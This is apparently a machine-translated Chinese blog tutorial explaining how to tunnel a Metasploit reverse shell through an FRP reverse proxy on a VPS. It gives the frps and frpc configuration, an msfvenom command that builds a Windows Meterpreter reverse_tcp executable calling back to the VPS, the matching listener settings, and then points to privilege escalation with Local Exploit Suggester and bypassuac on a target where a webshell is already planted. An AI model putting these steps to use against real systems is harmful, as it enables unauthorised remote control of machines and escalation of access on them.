当前位置:网站首页>FRP reverse proxy +msf get shell
FRP reverse proxy +msf get shell
2022-07-03 00:15:00 【Lomi only bear】
0x00: brief introduction frp Is a reverse proxy tool . You can easily penetrate the intranet . Provide services to the Internet ,frp Support tcp agreement , http agreement , https Equal agreement type , also web Service supports routing and forwarding based on domain name .
0x01: Environmental accountability
Drone aircraft :x.x.174.171( Hereinafter referred to as target )
kali:192.168.1.106( Hereinafter referred to as kali)
vps:x.x.193.94( Hereinafter referred to as vps)
Obtained in the target webshell
0x02: Start reverse
One 、 stay vps Downloading in frp And edit frps.ini
vim frps.ini
#frp Connection port between server and client ,frps and frpc It has to be consistent bind_port = 7000
start-up frps:./frps -c ./frps.ini
Two 、 stay kali Downloading in frp And edit frpc.ini
vim frpc.ini
[common] server_addr = x.x.193.94 server_port = 7000 #frpc Work port , Must match the above frps bring into correspondence with [msf] type = tcp local_ip = 127.0.0.1 local_port = 5555 # Forward to this machine 5555 remote_port = 6000 # The service side with 6000 Port forward to local
start-up frpc:./frpc -c ./frpc.ini
here frp The reverse proxy is finished , Let's start with MSF Horse making and setting monitoring .
3、 ... and 、MSF Make a horse
msfvenom -p windows/meterpreter/reverse_tcp lhost=x.x.193.94 lport=6000 -f exe x>i.exe
Notice here :
lport The port of is you frpc.ini Inside remote_port = 6000 port
Four 、 Set listening 、 perform msf Horse
Notice here :
set lhost 127.0.0.1 # Set listening ip, It has to be with frpc Medium local_ip Agreement set lport 5555 # Set listening port , And frpc Medium local_port Agreement
Go to the target plane to execute i.exe
Observe vps Upper frp
Observe local kali
Obtained shell
tips: Built-in module Local Exploit Suggester. This module can help us identify which vulnerabilities in the system can be exploited , And provide us with the most suitable exp, Through this exp We can further raise our rights .
My most commonly used bypassuac modular
exploit/windows/local/bypassuac
边栏推荐
- 95 pages of smart education solutions 2022
- How do educators find foreign language references?
- 秒杀系统设计
- Maybe you read a fake Tianlong eight
- A single element in an ordered array -- Valentine's Day mental problems
- Flexible combination of applications is a false proposition that has existed for 40 years
- yolov5test. Py comment
- 大学生课堂作业2000~3000字的小论文,标准格式是什么?
- 国外的论文在那找?
- ArrayList analysis 2: pits in ITR, listiterator, and sublist
猜你喜欢
What is the official website address of e-mail? Explanation of the login entry of the official website address of enterprise e-mail
95页智慧教育解决方案2022
Bean load control
Optimization of streaming media technology
Architecture: database architecture design
開源了 | 文心大模型ERNIE-Tiny輕量化技術,又准又快,效果全開
Master the development of facial expression recognition based on deep learning (based on paddlepaddle)
Digital twin visualization solution digital twin visualization 3D platform
How much do you know about synchronized?
Mutual exclusion and synchronization of threads
随机推荐
Several methods of the minimum value in the maximum value of group query
带角度的检测框 | 校准的深度特征用于目标检测(附实现源码)
写论文可以去哪些网站搜索参考文献?
Angled detection frame | calibrated depth feature for target detection (with implementation source code)
Returns the maximum distance between two nodes of a binary tree
collections. What is the purpose of chainmap- What is the purpose of collections. ChainMap?
容器运行时分析
洛谷_P1149 [NOIP2008 提高组] 火柴棒等式_枚举打表
Architecture: database architecture design
Request and response
ArrayList分析2 :Itr、ListIterator以及SubList中的坑
教育学大佬是怎么找外文参考文献的?
ArrayList analysis 2: pits in ITR, listiterator, and sublist
Master the development of facial expression recognition based on deep learning (based on paddlepaddle)
95 pages of smart education solutions 2022
接口差异测试——Diffy工具
[reading notes] phased summary of writing reading notes
leetcode 650. 2 Keys Keyboard 只有两个键的键盘(中等)
Difference between NVIDIA n card and amda card
[error record] the flutter reports an error (could not resolve io.flutter:flutter_embedding_debug:1.0.0.)